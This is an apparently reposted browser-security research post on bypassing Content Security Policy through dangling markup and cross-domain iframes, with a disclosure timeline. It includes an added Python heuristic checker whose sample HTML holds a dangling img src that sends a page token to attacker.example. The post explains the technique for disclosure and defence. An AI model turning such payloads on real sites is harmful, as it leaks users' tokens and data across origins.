Bypassing CSP with dangling iframes

by Prapattimynk, Monday, 11 September 2023 (6 months ago)

Introduction

Our Web Security Academy has a topic on dangling markup injection – a technique for exploiting sites protected by CSP. But something interesting happened when we came to update to Chrome 97 – because one of our interactive labs mysteriously stopped working. When we originally made this lab, Chrome prevented dangling markup-based attacks by looking for raw whitespace followed by "<" characters – but forgot to prevent background attributes (as discovered by Masato Kinugawa).

Unfortunately, from Chrome 97 this technique no longer worked, so I was tasked to try and find an alternative. I tried many different attributes and CSS-based animations to delay assignments to try and bypass this protection. They all failed – it appears the force is strong with Mike West, who authored this change.
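To make the Chrome mitigation described above concrete, here is an added Python example (not from the original post, the lab, or Chromium's own source) that extracts attribute URLs roughly the way an HTML tokenizer would and applies the heuristic as the post describes it: a URL containing raw whitespace followed by "<" is treated as dangling markup and blocked. The sample fragments, domains and token value are constructed; the exact whitespace set Chrome checks is assumed.

```python
import re

# The rule as the post describes it: raw whitespace followed by a "<" inside
# the URL marks it as dangling markup. (Assumed reading; Chromium's own check
# may differ in which whitespace characters it considers.)
DANGLING_RE = re.compile(r"\s+<")

# Attributes that trigger a fetch; "background" is included because the post
# notes it was initially missed by the mitigation.
ATTR_START_RE = re.compile(r"""\b(src|background)\s*=\s*(["'])""")


def is_dangling_markup_url(url):
    """True if the heuristic would block a request to this URL."""
    return DANGLING_RE.search(url) is not None


def extract_attr_urls(html):
    """Approximate tokenizer behaviour: a quoted attribute value runs until the
    next matching quote, even across newlines and other tags. A value with no
    closing quote reaches end of input, so the tag is dropped and no request
    is made; such values are skipped."""
    urls = []
    for m in ATTR_START_RE.finditer(html):
        quote, start = m.group(2), m.end()
        end = html.find(quote, start)
        if end == -1:
            continue
        urls.append(html[start:end])
    return urls


def audit(html):
    """Return (url, verdict) for every fetchable attribute URL in the fragment."""
    return [(u, "blocked" if is_dangling_markup_url(u) else "allowed")
            for u in extract_attr_urls(html)]


# Constructed samples: a normal image, an unclosed src that swallows the
# following markup up to the next double quote, and an unclosed src with no
# closing quote anywhere after it.
BENIGN = '<img src="https://cdn.example/logo.png" alt="logo">'
SWALLOWED = (
    '<img src="https://attacker.example/?\n'
    '<p>Your token is tok_constructed_1234</p>\n'
    '<a href="/next">next</a>'
)
UNTERMINATED = '<img src="https://attacker.example/?\n<p>no closing quote</p>'
```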

I took a step back and analysed the CSP:

default-src 'self';object-src 'none'; style-src 'self'; script-src 'self'; img-src *;

This looks watertight, right (apart from the img-src)? What if I told you that you could remove the ‘img-src’ directive and yet still conduct a dangling markup attack without a click? Let’s see how …

Cross domain iframe issues

First I fired up the Hackability inspector which is a security-focussed enumerator I coded a while back and began to dissect the inner workings of iframes. The Inspector is convenient for testing multiple domains for cross-domain leaks. I added the first iframe and inside that instance, I added another iframe:

Proof of concept

Conclusion

CSP treats about:blank URLs as the same origin – however when an attacker sets a cross domain iframe to about:blank, it becomes readable by an attacker and is definitely not the same origin. The Chrome mitigations for dangling markup attacks prevent some attacks, but by abusing browser quirks, it’s possible to sidestep those mitigations and gain access to cross domain information via an injection – even with JavaScript disabled in your CSP.

Timeline

2022-02-10 08:55 AM GMT – Reported bug to Google
2022-02-10 09:38 AM GMT – Reported to Mozilla
2022-06-14 15:00 GMT – Published this post



